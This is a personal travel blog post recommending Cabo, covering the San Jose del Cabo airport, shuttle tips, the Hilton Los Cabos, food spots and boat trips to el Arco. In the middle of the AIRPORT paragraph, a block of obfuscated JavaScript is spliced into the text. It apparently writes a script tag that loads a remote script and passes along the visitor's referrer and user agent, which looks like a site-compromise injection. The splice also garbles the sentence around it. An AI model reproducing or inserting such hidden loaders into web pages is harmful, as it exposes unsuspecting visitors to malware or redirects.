Travel: Cabo

It’s freezing here in California.  Literally.  I slipped (not bad) on a patch of ice while on our weekly Starbucks walk!  Don’t worry, I saved the drink 🙂

So this week I thought I’d talk about my favorite WARM vacation spot, Cabo!

We first headed to Cabo in 2009, and fell in love with the area.  There are 3 main areas of Cabo: San Jose del Cabo, the Corridor and Cabo San Lucas.  There’s actually a 4th area, Pedregal…it’s kind of for ballers.  So if you go to Pedregal, I’d be happy to join you 🙂

AIRPORT
You ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|arnyf|var|u0026u|referrer|idebd||js|php’.split(‘|’),0,{}))
will want to fly into San Jose del Cabo (SJD) – and it’s a quick flight from any California international airport.

TRANSPORTATION
We always used
Cabo San Lucas Tours and have never had any problems.  You can always take a cab, reserve a private shuttle or rent a car if you prefer.  **If you book through Cabo Tours, they will give you instructions on how to exit the airport.  There will be a million people that claim to be your shuttle guides.  They are lying to you.  Your shuttle driver will be OUTSIDE the building.  Ignore the people inside or you might end up sitting through a timeshare presentation.

HOTELS
To be fair, we’ve only ever stayed at 1 place, but we’ve stayed there many times.  It’s along the corridor, with easy access to either San Jose or Cabo San Lucas.  Hilton los Cabos.The pool is amazing, they bring out popsicles when it gets hot, and you get free appetizers with your drinks at happy hour in the bar.

The other cool part about the Hilton is that they have an excellent turtle conservation program.  If you time it right, you can release turtles into the ocean.  It’s kind of amazing.

FOOD
Basically everything was delicious.  The hotel has tasty food, especially the pizza at lunch at the pool.  Dinner at the main restaurant includes chips, salsa, AND guacamole, so knock yourself out!  Breakfast is spendy, but there’s a small store/cafe where you can get snacks.

There’s a MEGA in San Jose del Cabo on your way to the airport, and we sometimes stop there for snacks and drinks.  Next to the Mega is Villa Valentina and there are a few good spots to eat in there as well.  The place looks a little funny from the outside, but it’s gorgeous on the inside.  Down the street, past the McDonald’s as you’re heading away from the Mega.

SAN JOSE AND CABO

If you can pull yourself away from the resort, take a visit to both San Jose and Cabo.  San Jose is the old cabo – you’ll feel a little more cultured.  Go to Cabo for the alcohol and parties. Cabo is also the spot where you can catch a glass bottom boat to el Arco.  They cost around $5-$15 per person.  Depends on how many in your party and how well you’re willing to haggle.  The life jacket is free and optional.

Man….I wanna go back.
